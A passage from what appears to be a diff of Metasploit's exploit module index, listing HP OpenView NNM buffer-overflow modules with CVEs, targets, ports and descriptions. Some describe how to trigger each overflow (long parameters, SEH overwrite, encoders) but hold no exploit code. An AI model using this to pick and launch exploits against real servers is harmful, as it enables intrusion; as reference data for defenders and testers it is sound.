"/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_getnnmdata_hostname", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_getnnmdata_icount": { + "name": "HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_getnnmdata_icount", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-05-11", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending specially crafted ICount parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2010-1554", + "OSVDB-64976" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.50", + "HP OpenView Network Node Manager 7.53" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_getnnmdata_icount", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_getnnmdata_maxage": { + "name": "HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_getnnmdata_maxage", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-05-11", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending specially 
crafted MaxAge parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2010-1553", + "OSVDB-64976" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.50", + "HP OpenView Network Node Manager 7.53" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_getnnmdata_maxage", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_nnmrptconfig_nameparams": { + "name": "HP OpenView NNM nnmRptConfig nameParams Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_nnmrptconfig_nameparams", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-01-10", + "type": "exploit", + "author": [ + "sinn3r ", + "MC " + ], + "description": "This module exploits a vulnerability in HP NNM's nnmRptConfig.exe.\n A remote user can send a long string data to the nameParams parameter via\n a POST request, which causes an overflow on the stack when function\n ov.sprintf_new() is used, and gain arbitrary code execution.'", + "references": [ + "CVE-2011-0266", + "OSVDB-70473", + "ZDI-11-008" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "HP NNM 7.53 Windows Server 2003 Enterprise", + "HP OpenView Network Node Manager 7.50" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb", + "is_install_path": true, + "ref_name": 
"windows/http/hp_nnm_nnmrptconfig_nameparams", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_nnmrptconfig_schdparams": { + "name": "HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_nnmrptconfig_schdparams", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-01-10", + "type": "exploit", + "author": [ + "sinn3r " + ], + "description": "This module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs,\n the overflow occurs during a ov.sprintf_new() call, which allows an attacker to\n overwrite data on the stack, and gain arbitrary code execution.", + "references": [ + "CVE-2011-0267", + "OSVDB-70473", + "ZDI-11-009" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "NNM 7.53 - Windows Server 2003 Ent" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_nnmrptconfig_schdparams", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_openview5": { + "name": "HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_openview5", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-12-06", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request, an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2007-6204", + "OSVDB-39530", + 
"BID-26741" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP OpenView Network Node Manager 7.50 / Windows 2000 All" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_openview5.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_openview5", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_ovalarm_lang": { + "name": "HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_ovalarm_lang", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-09", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53.\n By sending a specially crafted CGI request to ovalarm.exe, an attacker can execute\n arbitrary code.\n\n This specific vulnerability is due to a call to \"sprintf_new\" in the \"isWide\"\n function within \"ovalarm.exe\". A stack buffer overflow occurs when processing an\n HTTP request that contains the following.\n\n 1. An \"Accept-Language\" header longer than 100 bytes\n 2. 
An \"OVABverbose\" URI variable set to \"on\", \"true\" or \"1\"\n\n The vulnerability is related to \"_WebSession::GetWebLocale()\".\n\n NOTE: This exploit has been tested successfully with a reverse_ord_tcp payload.", + "references": [ + "CVE-2009-4179", + "OSVDB-60930", + "BID-37347", + "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-09-12", + "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.53", + "HP OpenView Network Node Manager 7.53 (Windows 2003)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_ovalarm_lang", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_ovas": { + "name": "HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_ovas", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-04-02", + "type": "exploit", + "author": [ + "bannedit ", + "muts" + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager versions 7.53 and earlier.\n Specifically this vulnerability is caused by a failure to properly handle user supplied input within the\n HTTP request including headers and the actual URL GET request.\n\n Exploitation is tricky due to character restrictions. 
It was necessary to utilize a egghunter shellcode\n which was alphanumeric encoded by muts in the original exploit.\n\n If you plan on using exploit this for a remote shell, you will likely want to migrate to a different process\n as soon as possible. Any connections get reset after a short period of time. This is probably some timeout\n handling code that causes this.", + "references": [ + "CVE-2008-1697", + "OSVDB-43992", + "BID-28569" + ], + "platform": "Windows", + "arch": "", + "rport": 7510, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting", + "Windows 2003/zip.dll OpenView 7.53", + "Windows 2000/jvm.dll OpenView NNM 7.51" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_ovas.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_ovas", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_ovbuildpath_textfile": { + "name": "HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_ovbuildpath_textfile", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-11-01", + "type": "exploit", + "author": [ + "Anyway ", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node\n Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long\n 'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can\n cause a stack-based buffer overflow and execute arbitrary code.\n\n The vulnerable code is within the \"_OVBuildPath\" function within \"ov.dll\". 
There\n are no stack cookies, so exploitation is achieved by overwriting the saved return\n address.\n\n The vulnerability is due to the use of the function \"_OVConcatPath\" which finally\n uses \"strcat\" in an insecure way. User controlled data is concatenated to a string\n which contains the OpenView installation path.\n\n To achieve reliable exploitation a directory traversal in OpenView5.exe\n (OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation\n path. If the installation path cannot be guessed the default installation path\n is used.", + "references": [ + "CVE-2011-3167", + "OSVDB-76775", + "BID-50471", + "ZDI-12-002", + "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3" + ], + "mod_time": "2021-10-06 13:43:31 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_ovbuildpath_textfile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/hp_nnm_ovwebhelp": { + "name": "HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_ovwebhelp", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-09", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2009-4178", + "OSVDB-60929", + "BID-37340" 
+ ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.50" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_ovwebhelp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_ovwebsnmpsrv_main": { + "name": "HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_ovwebsnmpsrv_main", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-06-16", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is triggerable via either a GET or POST request. The buffer being\n written to is 1024 bytes in size. It is important to note that this vulnerability must\n be exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered!\n\n The vulnerable code is within the \"main\" function within \"ovwebsnmpsrv.exe\" with a\n timestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is\n easily achieved by overwriting SEH structures.\n\n There exists some unreliability when running this exploit. It is not completely clear why\n at this time, but may be related to OVWDB or session management. Also, on some attempts\n OV NNM may report invalid characters in the URL. 
It is not clear what is causing this\n either.", + "references": [ + "CVE-2010-1964", + "OSVDB-65552", + "BID-40873", + "ZDI-10-108" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.53 w/NNM_01201", + "HP OpenView Network Node Manager 7.53 (Windows 2003)", + "Debug Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_ovwebsnmpsrv_main", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_ovwebsnmpsrv_ovutil": { + "name": "HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-06-16", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is triggerable via either a GET or POST request. It is interesting to\n note that this vulnerability cannot be exploited by overwriting SEH, since attempting\n to would trigger CVE-2010-1964.\n\n The vulnerable code is within a sub-function called from \"main\" within \"ovwebsnmpsrv.exe\"\n with a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer\n which is passed to the \"getProxiedStorageAddress\" function within ovutil.dll. 
When\n processing the address results in an error, the buffer is overflowed in a call to sprintf_new.\n There are no stack cookies present, so exploitation is easily achieved by overwriting the\n saved return address.\n\n There exists some unreliability when running this exploit. It is not completely clear why\n at this time, but may be related to OVWDB or session management. Also, on some attempts\n OV NNM may report invalid characters in the URL. It is not clear what is causing this\n either.", + "references": [ + "CVE-2010-1961", + "OSVDB-65428", + "BID-40638", + "ZDI-10-106", + "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.53 w/NNM_01201", + "HP OpenView Network Node Manager 7.53 (Windows 2003)", + "Debug Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_ovwebsnmpsrv_ovutil", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_ovwebsnmpsrv_uro": { + "name": "HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-06-08", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. 
By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n The vulnerable code is within the option parsing function within \"ovwebsnmpsrv.exe\" with a\n timestamp prior to April 7th, 2010.\n\n Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined\n with some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is\n important to note that this vulnerability must be exploited by overwriting SEH. This is since\n overflowing the buffer with controllable data always triggers an access violation when\n attempting to write static text beyond the end of the stack.\n\n Exploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish\n arbitrary code execution, a double-backward jump is used in combination with the Alpha2\n encoder.", + "references": [ + "CVE-2010-1960", + "OSVDB-65427", + "BID-40637", + "ZDI-10-105" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.53 w/NNM_01206", + "Debug Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_ovwebsnmpsrv_uro", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_snmp": { + "name": "HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_snmp", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-09", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer 
overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2009-3849", + "OSVDB-60933" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.50 / Windows 2000 All" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_snmp.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_snmp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_snmpviewer_actapp": { + "name": "HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_snmpviewer_actapp", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-05-11", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By making a specially crafted HTTP request to the \"snmpviewer.exe\"\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary\n code.\n\n The vulnerable code lies within a function within \"snmpviewer.exe\" with a\n timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET\n or POST request. 
The request must contain 'act' and 'app' parameters which, when\n combined, total more than the 1024 byte stack buffer can hold.\n\n It is important to note that this vulnerability must be exploited by overwriting SEH.\n While the saved return address can be smashed, a function call that occurs before\n the function returns calls \"exit\".", + "references": [ + "CVE-2010-1552", + "OSVDB-64975", + "BID-40068", + "ZDI-10-083", + "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.53 w/NNM_01201", + "HP OpenView Network Node Manager 7.53 (Windows 2003)", + "Debug Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_snmpviewer_actapp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_toolbar_01": { + "name": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_toolbar_01", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-01-07", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2008-0067", + "OSVDB-53222", + "BID-33147" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + 
"https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.50 / Windows 2000 All" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_toolbar_01.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_toolbar_01", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_toolbar_02": { + "name": "HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_toolbar_02", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-01-21", + "type": "exploit", + "author": [ + "Oren Isacson", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0\n and 7.53. By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an\n attacker may be able to execute arbitrary code. Please note that this module only works\n against a specific build (i.e. 
NNM 7.53_01195)", + "references": [ + "CVE-2009-0920", + "OSVDB-53242", + "BID-34294", + "URL-http://www.coresecurity.com/content/openview-buffer-overflows" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "HP OpenView Network Node Manager Release B.07.00", + "HP OpenView Network Node Manager 7.53 Patch 01195" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_toolbar_02.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_toolbar_02", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_webappmon_execvp": { + "name": "HP OpenView Network Node Manager execvp_nc Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_webappmon_execvp", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-07-20", + "type": "exploit", + "author": [ + "Shahin Ramezany ", + "sinn3r ", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01207 or NNM_01206 without the SSRT100025 hotfix. By specifying a long 'sel'\n parameter when calling methods within the 'webappmon.exe' CGI program, an attacker can\n cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is not triggerable via a GET request due to limitations on the\n request size. The buffer being targeted is 16384 bytes in size. There are actually two\n adjacent buffers that both get overflowed (one into the other), and strcat is used.\n\n The vulnerable code is within the \"execvp_nc\" function within \"ov.dll\" prior to\n v 1.30.12.69. 
There are no stack cookies, so exploitation is easily achieved by\n overwriting the saved return address or SEH frame.\n\n This vulnerability might also be triggerable via other CGI programs, however this was\n not fully investigated.", + "references": [ + "CVE-2010-2703", + "OSVDB-66514", + "BID-41829", + "ZDI-10-137", + "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02286088" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "HP OpenView Network Node Manager 7.53 w/NNM_01206", + "HP OpenView Network Node Manager 7.53 (Windows 2003)", + "Debug Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_webappmon_execvp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_webappmon_ovjavalocale": { + "name": "HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_webappmon_ovjavalocale", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-08-03", + "type": "exploit", + "author": [ + "Nahuel Riva", + "sinn3r ", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53.\n By sending a request containing a cookie longer than 5120 bytes, an attacker can overflow\n a stack buffer and execute arbitrary code.\n\n The vulnerable code is within the OvWwwDebug function. The static-sized stack buffer is\n declared within this function. 
When the vulnerability is triggered, the stack trace looks\n like the following:\n\n #0 ...\n #1 sprintf_new(local_stack_buf, fmt, cookie);\n #2 OvWwwDebug(\" HTTP_COOKIE=%s\\n\", cookie);\n #3 ?OvWwwInit@@YAXAAHQAPADPBD@Z(x, x, x);\n #4 sub_405ee0(\"nnm\", \"webappmon\");\n\n No validation is done on the cookie argument. There are no stack cookies, so exploitation\n is easily achieved by overwriting the saved return address or SEH frame.\n\n The original advisory detailed an attack vector using the \"OvJavaLocale\" cookie being\n passed in a request to \"webappmon.exe\". Further research shows that several different\n cookie values, as well as several different CGI applications, can be used.\n '", + "references": [ + "CVE-2010-2709", + "OSVDB-66932", + "BID-42154", + "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02446520", + "URL-http://www.coresecurity.com/content/hp-nnm-ovjavalocale-buffer-overflow" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "HP OpenView Network Node Manager 7.53", + "HP OpenView Network Node Manager 7.53 (Windows 2003)", + "Debug Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_webappmon_ovjavalocale", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_openview_insight_backdoor": { + "name": "HP OpenView Performance Insight Server Backdoor Account Code Execution", + "fullname": "exploit/windows/http/hp_openview_insight_backdoor", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-01-31", + "type": "exploit", + "author": [ + "MC " + ], + "description": 
"This module exploits a hidden account in the com.trinagy.security.XMLUserManager Java\n class. When using this account, an attacker can abuse the\n com.trinagy.servlet.HelpManagerServlet class and write arbitrary files to the system\n allowing the execution of arbitrary code.\n\n NOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0", + "references": [ + "CVE-2011-0276", + "OSVDB-70754" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Universal Windows Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_openview_insight_backdoor.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_openview_insight_backdoor", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_pcm_snac_update_certificates": { + "name": "HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload", + "fullname": "exploit/windows/http/hp_pcm_snac_update_certificates", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-09-09", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The\n vulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary\n files, just having into account binary writes aren't allowed. Additionally, authentication\n can be bypassed in order to upload the file. 
